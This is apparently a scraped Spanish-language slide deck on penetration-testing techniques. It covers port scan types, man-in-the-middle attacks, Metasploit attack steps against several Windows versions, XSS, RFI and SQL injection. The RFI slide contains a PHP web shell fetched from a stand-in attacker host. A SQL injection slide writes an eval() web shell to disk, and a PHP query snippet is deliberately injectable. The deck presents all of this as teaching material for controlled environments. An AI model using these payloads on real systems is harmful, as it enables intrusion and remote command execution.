Técnicas avanzadas depenetración a sistemas
HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensi...
QUE ES UN HACKER Experto en algún campo de la informática Conocimientos profundos de diversas  Plataformas (Windows, Uni...
Pasos previos al                              ATAQUE1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso•   Nive...
FOOTPRINTINGObtención de los perfiles de seguridad de una organizaciónhaciendo uso de una metodología (footprinting).El re...
FOOTPRINTING1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute
TIPOS DE ATAQUES1.- Hacking WIFI         8.-Inyecciones SQL2.-DOS                   9.-R.F.I                         10.-X...
Escaneo de PuertosEl escaneo de puertos es el ataque primario y mas comúnutilizado en una auditoria ya sea legal o ilegal....
Técnicas                               Tipo de                               escaneo                 Medio                ...
TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCPIntenta e...
Comportamiento                    TCP connect()Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]...
TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto porexcelenciase envía un paquete SYN fingiendo establec...
Comportamiento            TCP SYNHacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP ab...
ACK scanDestinado a identificar aquellos puertos que están en estadosilencioso de forma precisa cuando un puerto esta en e...
Comportamiento             ACK scanHacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto ...
Null scanSimilar al FIN, funciona del mismo modo, enviandopaquetes malformados, pero en este caso conlos flags desactivado...
Comportamiento               Null scanHacker ---[ ]---> [O] Puerto TCP abierto en la Victimalocal ---[ ]---> [X] Puerto TC...
La razón
POC
Ataques MIT  1.   DNS cache poisoning  2.   ARP Poisoning  3.   Phishing  4.   Sslstrip
EXPLOTACION
Escáner devulnerabilidades
Escáner devulnerabilidades
EXPLOTACION
MetasploitWindows Server 2003
Penetración                           Windows Server 2003                           prueba de concepto      Puerto 4451.  ...
MetasploitWindows Server 2008 R2
Metasploit                 Windows Server 2008 R2 •Numero de vulnerabilidad : ms09050 •Encontrar el servidor verificando v...
MetasploitWindows XP SP3
Metasploit            Penetración a Windows XP SP3                 Prueba de concepto 1. Encontrar la victima verificando ...
MetasploitWindows 7
Metasploit                   Windows 7 Penetración                    Prueba de concepto 1. Usar INGENIERIA SOCIAL 2. Copi...
Ataques WEB
Ataques XSSAnalicemos la vulnerabilidad de xssEs una vulnerabilidad de grado medio alto ya que con estosataques será posib...
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFI                 Remote file inclusionvulnerabilidad que afecta únicamente a paginas dinámicasprogramadas en PH...
Ataques RFI                 Remote file inclusion         http://www.victima.com/index.php?nav=pagina1php         http://w...
Inyeccion SQLunion all select "<?phpeval($_GET[exec]); ?>",2,3,4intooutfile"/var/www/html/exec.php"
Analicemos este código<?php  $link = mysql_connect(127.0.0.1,root, pass);  mysql_select_db(ejemplo, $link);  $sql = mysql_...
Busqueda de tablas.
Evacion de IDS
El atacante sabe que existen filtros que evitara lallegada de la inyección al servidor, el usara unacombinación de caracte...
Char double encode  El atacante sabe que existen filtros que evitara la  llegada de la inyección al servidor, el usara una...
Space 2 mssql blank El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una ...
Prueba de conceptoOBJETIVOMostrar el ataque de inyección SQL y eldumpeo de la BD. en un ambientecontrolado.
GRACIAS
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
Upcoming SlideShare
Loading in...5
×

Tecnicas avanzadas de penetracion a sistemas con ids

3,314

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,314
On Slideshare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
71
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Tecnicas avanzadas de penetracion a sistemas con ids

  1. 1. Técnicas avanzadas depenetración a sistemas
  2. 2. HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hayque fijarse en el contexto.
  3. 3. QUE ES UN HACKER Experto en algún campo de la informática Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.
  4. 4. Pasos previos al ATAQUE1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso• Niveles del Sistema• Redes• DOS4. Mantener el acceso5. Borrado de huellas
  5. 5. FOOTPRINTINGObtención de los perfiles de seguridad de una organizaciónhaciendo uso de una metodología (footprinting).El resultado del footprinting es un perfil único de laorganización en cuanto a sus redes (Internet / Intranet /Extranet /Wireless) y sistemas.
  6. 6. FOOTPRINTING1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute
  7. 7. TIPOS DE ATAQUES1.- Hacking WIFI 8.-Inyecciones SQL2.-DOS 9.-R.F.I 10.-XSS3.-DDOS 11.-Inyeccion de4.-M.I.T comandos arbitrarios5.- Envenenamiento DNS 12.-Hijacking6.-Reverse Shell 13.-Cookie poisoning7.-Port scaning
  8. 8. Escaneo de PuertosEl escaneo de puertos es el ataque primario y mas comúnutilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender
  9. 9. Técnicas Tipo de escaneo Medio Otros Abierto Silencioso Barridos abiertoTCP connect () TCP SYN TCP FIN TCP echo UDP scanReverse Ident Zombie scan ACK Scan UDP echo FTP bounce Null Scan TCP ACK scan Xmas Scan TCP SYN ICMP echo SYN/ACK Scan Fragmentación TCP
  10. 10. TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCPIntenta establecer conexiónSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silenciosoMuy rápido e invasivo y llamativo en exceso.* Miles de conexiones*Logs
  11. 11. Comportamiento TCP connect()Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPENHacker-------[ACK]------->[0] Puerto TCP Victima OPENHacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker<-----[RST]-------[X] Puerto TCP Victima CLOSEDHacker------[SYN]-------[*] Puerto TCP Victima SILENT
  12. 12. TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto porexcelenciase envía un paquete SYN fingiendo establecer una conexion y seespera la respuesta del Host, si llega un paquete SYN/ACKsignifica que esta abierto y no devolvemos la contestación ACK,devolvemos RST , esto para evitar que se complete el iniciode conexión y así burlar el registro del sistema como intento deconexión *Discreto *Excelentes resultados
  13. 13. Comportamiento TCP SYNHacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP abierto en la VictimaHacker ---[RST]---> [O] P. TCP abierto en la VictimaHacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
  14. 14. ACK scanDestinado a identificar aquellos puertos que están en estadosilencioso de forma precisa cuando un puerto esta en este estado ono.Envía paquetes ACK con números de secuencia y confirmaciónaleatorios.si el puerto esta abierto, responderá con un paquete RST, pues noidentificara la conexión como suyasi el puerto esta cerrado responderá RST pero si no responde es queesta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.
  15. 15. Comportamiento ACK scanHacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto TCP abierto en la VictimaHacker ---[ACK]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
  16. 16. Null scanSimilar al FIN, funciona del mismo modo, enviandopaquetes malformados, pero en este caso conlos flags desactivados, si el puerto esta cerrado nosresponderá con RST y En caso de no recibir nada el puertoesta abierto o silencioso.Ciertos firewalls vigilan los paquetes de finalización aquíhace lo que FIN no.
  17. 17. Comportamiento Null scanHacker ---[ ]---> [O] Puerto TCP abierto en la Victimalocal ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
  18. 18. La razón
  19. 19. POC
  20. 20. Ataques MIT 1. DNS cache poisoning 2. ARP Poisoning 3. Phishing 4. Sslstrip
  21. 21. EXPLOTACION
  22. 22. Escáner devulnerabilidades
  23. 23. Escáner devulnerabilidades
  24. 24. EXPLOTACION
  25. 25. MetasploitWindows Server 2003
  26. 26. Penetración Windows Server 2003 prueba de concepto Puerto 4451. ms080672. Crear usuario3. Habilitar Escritorio Remoto4. Cambiar la contraseña del Administrador OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
  27. 27. MetasploitWindows Server 2008 R2
  28. 28. Metasploit Windows Server 2008 R2 •Numero de vulnerabilidad : ms09050 •Encontrar el servidor verificando versión de smb •Explotar la vulnerabilidad •Denegación de servicios.OBJETIVOMostrar el ataque de Denegación deservicios a Windows server 2008 en unambiente controlado.
  29. 29. MetasploitWindows XP SP3
  30. 30. Metasploit Penetración a Windows XP SP3 Prueba de concepto 1. Encontrar la victima verificando versión de SMB 2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto 4. Inyectar la conexión a escritorio remotoOBJETIVOMostrar el ataque de penetración awindows XP sp3 en un ambiente controlado.
  31. 31. MetasploitWindows 7
  32. 32. Metasploit Windows 7 Penetración Prueba de concepto 1. Usar INGENIERIA SOCIAL 2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL 3. Vulnerar navegador web. 4. UPLOAD MI PATH C:DESTINODownloadsOBJETIVOMostrar el ataque de penetración awindows 7 en un ambiente controlado.
  33. 33. Ataques WEB
  34. 34. Ataques XSSAnalicemos la vulnerabilidad de xssEs una vulnerabilidad de grado medio alto ya que con estosataques será posible el re alizar el hijacking que es el robo deidentidad mediante las cookies del navegador
  35. 35. Ataques XSS
  36. 36. Ataques XSS
  37. 37. Ataques XSS
  38. 38. Ataques RFI Remote file inclusionvulnerabilidad que afecta únicamente a paginas dinámicasprogramadas en PHP, consiste en enlazar archivos ubicados en unservidor remoto.RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitadoconocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variablerecibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosospara incluir scriptsprogramados para explotar dicha vulnerabilidad.
  39. 39. Ataques RFI Remote file inclusion http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php <?php print system($_GET[command]); ?>http://www.victima.com/index.php?nav=http://atacante.com/shell .txt&command=ls
  40. 40. Inyeccion SQLunion all select "<?phpeval($_GET[exec]); ?>",2,3,4intooutfile"/var/www/html/exec.php"
  41. 41. Analicemos este código<?php $link = mysql_connect(127.0.0.1,root, pass); mysql_select_db(ejemplo, $link); $sql = mysql_query(select * from ejemplo where id=.$_GET[id], $link); if(mysql_errno($link)) { echo mysql_error($link); exit; } while($row = mysql_fetch_assoc($sql)) { echo $ row[id]." ".$row[titulo]." ".$row[contenido]." ".$row[parent]; }? >
  42. 42. Busqueda de tablas.
  43. 43. Evacion de IDS
  44. 44. El atacante sabe que existen filtros que evitara lallegada de la inyección al servidor, el usara unacombinación de caracteres y encriptaciones parasaltarse los filtros y el IDS lo reconozca comovalidos.
  45. 45. Char double encode El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  46. 46. Space 2 mssql blank El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  47. 47. Prueba de conceptoOBJETIVOMostrar el ataque de inyección SQL y eldumpeo de la BD. en un ambientecontrolado.
  48. 48. GRACIAS
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×